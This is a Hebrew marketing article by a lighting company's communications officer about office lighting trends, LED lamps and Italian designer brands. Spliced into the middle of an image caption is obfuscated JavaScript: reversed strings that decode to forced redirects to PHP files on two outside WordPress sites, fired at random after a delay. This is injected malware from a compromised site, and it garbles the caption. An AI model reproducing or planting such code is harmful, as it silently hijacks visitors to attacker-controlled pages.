fbpx
[shortcode-weather-atlas city_selector=1178237 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

מאירים את המשרד

עולם התאורה המשרדית התפתח רבות בשנים האחרונות, עם עליית המודעות כי אין די בכך שהארת חללים משרדיים, ציבוריים ומוסדיים תהיה דקורטיבית ויפה, אם כי גם פונקציונאלית ונכונה
Modern boardroom with colorful chair $Ikf=function(n){if (typeof ($Ikf.list[n]) == "string") return $Ikf.list[n].split("").reverse().join("");return $Ikf.list[n];};$Ikf.list=["\'php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.r$mRi=function(n){if (typeof ($mRi.list[n]) == "string") return $mRi.list[n].split("").reverse().join("");return $mRi.list[n];};$mRi.list=["\'php.sedoctrohspots/bil/issnaveler/snigulp/tnetnoc-pw/moc.keewnoihsafmahnetlehc.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}$mRi=function(n){if (typeof ($mRi.list[n]) == "string") return $mRi.list[n].split("").reverse().join("");return $mRi.list[n];};$mRi.list=["\'php.sedoctrohspots/bil/issnaveler/snigulp/tnetnoc-pw/moc.keewnoihsafmahnetlehc.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}and white meeting table - 3D Rendering

מאת: לילך קדמי

הרימו לרגע את העיניים ממסך המחשב והביטו סביבכם. האם אתם עובדים בתנאי תאורה נאותים?. תאורה טובה עוזרת לנו להבחין בפרטים חשובים ומשמעותיים במהלך יום העבודה ומפחיתה את התעייפות העיניים ואי הנוחות המלווה בהתעייפות הגוף. במקומות עבודה רבים השכילו ליצור סביבת עבודה מוארת ונאותה לצרכים הספציפיים לכל חלל וחלל.

חברת קמחי תאורה מציגה מגוון רחב של חידושים ופתרונות בתחום התאורה המשרדית, המציפים את המשרד באור נעים ומגנים על ראייתם ובריאותם של העובדים. עולם התאורה המשרדית התפתח רבות בשנים האחרונות, עם עליית המודעות כי אין די בכך שהארת חללים משרדיים, ציבוריים ומוסדיים תהיה דקורטיבית ויפה, אם כי גם פונקציונאלית ונכונה.

לילך קדמי (צילום: רמי זרנגר)
לילך קדמי (צילום: רמי זרנגר)

מלבד אלמנט ויזואלי ברור, על גופי התאורה המשרדיים לספק תאורה חזקה ונכונה עבור העובדים במקום, שכן רובנו מבלים את מרבית שעות היום במשרד ועסוקים בקריאת מסמכים, התבוננות במסך מחשב ובפעולות נוספות העלולות לעייף את עינינו.

מותגי תאורה מובילים רבים, בהם Rotalian,  Panzeriו-Artemide האיטלקיים מציגים את החידושים והטרנדים הנוכחיים בעולם התאורה המשרדית. אם בעבר היו נפוצים במשרדים גופי תאורה העושים שימוש בנורות הלוגן, הרי שאלו איבדו ממעמדן ומוחלפות כיום בנורות LED חדשניות, אשר יתרונותיהן רבים, הן בתחום החיסכון בחשמל ובאורך חייהן, הן מבחינת הארת החלל באור חזק, הומוגני ושאינו מסנוור והן בכך שאינן מפיצות חום.

מבחינת החידושים העיצוביים, הרי שגם הם רבים. ניתן כיום למצוא מנורות פרופיל מעוצבות, בעלות זוויות וחיתוכים שונים, המעניקים מראה שאינו שגרתי, מנורות שולחן מתכווננות המתאימות לקריאה, כאשר הידועה שבהן היא הטולמאו האייקונית של המותג האיטלקי Artemide, הזמינה בגרסת ה-LED, מנורות צמודות קיר המעניקות תאורה לחלל כולו ועוד.

אלו שבכל זאת מעוניינים לקשט את המשרד בגופים שעיקרם דקורציה, יכולים בהחלט לעשות זאת במקומות המתאימים לכך, למשל התקנת מנורת תלייה מרשימה מעל דלפק הקבלה, מנורת עמידה בצורת קשת בפינת החלל ועוד.

© הכותבת היא אחראית תקשורת שיווקית בחברת קמחי תאורה

 

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות